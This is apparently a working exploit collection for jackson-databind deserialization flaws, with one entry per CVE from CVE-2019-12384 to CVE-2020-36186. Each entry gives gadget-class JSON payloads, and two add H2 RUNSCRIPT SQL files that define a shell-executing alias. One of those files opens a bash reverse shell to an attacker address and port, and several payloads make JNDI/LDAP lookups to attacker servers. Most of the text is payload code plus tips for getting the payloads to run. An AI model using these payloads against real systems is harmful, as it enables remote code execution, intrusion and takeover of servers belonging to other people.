CVE-2019-12384 (jackson-databind < 2.9.9.1; gadget: ch.qos.logback.core.db.DriverManagerConnectionSource — requires default typing to be enabled on the target, plus logback-core and the H2 JDBC driver on its classpath). Note on the one-line payloads below: Jackson's default typing expects the type wrapper as a two-element array, `["<class>", { ... }]`; the payloads written as `{"<class>",{ ... }}` are not valid JSON and must be bracketed like the last payload on this page before they will parse.

SSRF (blind): the jdbc:h2:tcp URL makes the target open an outbound TCP connection to IP. This only confirms the gadget fires and that egress is possible; it executes nothing by itself.

{"ch.qos.logback.core.db.DriverManagerConnectionSource",{"url":"jdbc:h2:tcp://IP/"}}

RCE: an in-memory H2 URL whose INIT=RUNSCRIPT clause fetches attacker-hosted SQL over HTTP, which in turn defines a Java-backed alias and calls it.

poc

{"ch.qos.logback.core.db.DriverManagerConnectionSource",{"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://IP/exp.sql'"}}

exec.sql — host this file at the URL named in the payload's RUNSCRIPT FROM clause. As written the payload above requests `exp.sql`, so either rename the file or fix the URL so the two match.

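-- exec.sql: pulled in by H2's INIT=RUNSCRIPT FROM '...' clause in the JDBC URL.
-- H2 compiles the Java body of CREATE ALIAS at runtime, so the target JVM
-- presumably needs a compiler available (a JDK rather than a bare JRE) — confirm
-- against the H2 version in use.
-- The Java source must be delimited with $$ ... $$ ; a single $ is not valid H2 syntax.
CREATE ALIAS SHELLEXEC AS $$
String shellexec(String cmd) throws java.io.IOException {
    // Run through "bash -c" so shell syntax in cmd (redirections, /dev/tcp) is honoured.
    String[] command = {"bash", "-c", cmd};
    // "\\A" makes next() return the whole stream, so this blocks until the child closes stdout.
    java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
    // Return the command's stdout, or "" when it printed nothing; stderr is not captured.
    return s.hasNext() ? s.next() : "";
}
$$;
-- 地址 / 端口 = attacker address / port for the reverse shell. Linux-only (needs bash and
-- /dev/tcp); the CALL does not return until the spawned shell exits.
CALL SHELLEXEC('bash -i >& /dev/tcp/地址/端口 0>&1')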

CVE-2020-8840 (jackson-databind < 2.9.10.3; gadget: org.apache.xbean.propertyeditor.JndiConverter, needs xbean-reflect on the classpath). This and the other ldap:// payloads below trigger a JNDI lookup against the attacker's LDAP server; on JDK 8u191+ remote codebase loading over LDAP is disabled by default, so exploitation then depends on a deserialization gadget returned by the LDAP server rather than a remote class.

{"org.apache.xbean.propertyeditor.JndiConverter", {"asText":"ldap://IP/e"}}

CVE-2020-9548 (jackson-databind < 2.9.10.4; gadget: br.com.anteros.dbcp.AnterosDBCPConfig — needs anteros-core on the classpath; metricRegistry is resolved via JNDI)

{"br.com.anteros.dbcp.AnterosDBCPConfig",{"metricRegistry":"ldap://IP/e"}}

CVE-2020-24616 (jackson-databind < 2.9.10.6; gadget: br.com.anteros.dbcp.AnterosDBCPDataSource — same library and property as CVE-2020-9548, different class)

{"br.com.anteros.dbcp.AnterosDBCPDataSource",{"metricRegistry":"ldap://IP/e"}}

CVE-2020-35728 (jackson-databind < 2.9.10.8; gadget: com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool — WebLogic's shaded Xalan; jndiPath is passed to a JNDI lookup)

{"com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool",{"jndiPath":"ldap://IP/e"}}

CVE-2020-36179 (jackson-databind < 2.9.10.8; gadget: org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS — needs commons-dbcp2 and the H2 driver on the classpath; same H2 RUNSCRIPT technique as CVE-2019-12384)

poc

{"org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS","url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://IP/exec.sql'"}

exec.sql — host this at `http://IP/exec.sql`, the URL in the payload's RUNSCRIPT FROM clause above. This variant targets Windows (the command run is calc.exe) and uses the single-string Runtime.exec form, so the command is split on whitespace rather than interpreted by a shell.

-- exec.sql: loaded by H2 through INIT=RUNSCRIPT FROM '...' in the JDBC URL.
-- Defines a Java-backed H2 function and immediately invokes it.
CREATE ALIAS SHELLEXEC AS $$
String shellexec(String cmd) throws java.io.IOException {
    // Single-string exec: cmd is tokenised on whitespace, no shell is involved.
    Process child = Runtime.getRuntime().exec(cmd);
    // Delimiter "\\A" makes next() consume stdout in one piece, i.e. until the child closes it.
    java.util.Scanner output = new java.util.Scanner(child.getInputStream()).useDelimiter("\\A");
    if (output.hasNext()) {
        return output.next();
    }
    return "";
}
$$;
-- Windows proof-of-execution: pops calc.exe on the target.
CALL SHELLEXEC('calc.exe')

CVE-2020-36186 (jackson-databind < 2.9.10.8; gadget: org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource — Tomcat's shaded DBCP; dataSourceName is resolved through JNDI). This payload uses the correct `[ "<class>", { ... } ]` wrapper-array form.

["org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource",{"dataSourceName":"ldap://IP/E"}]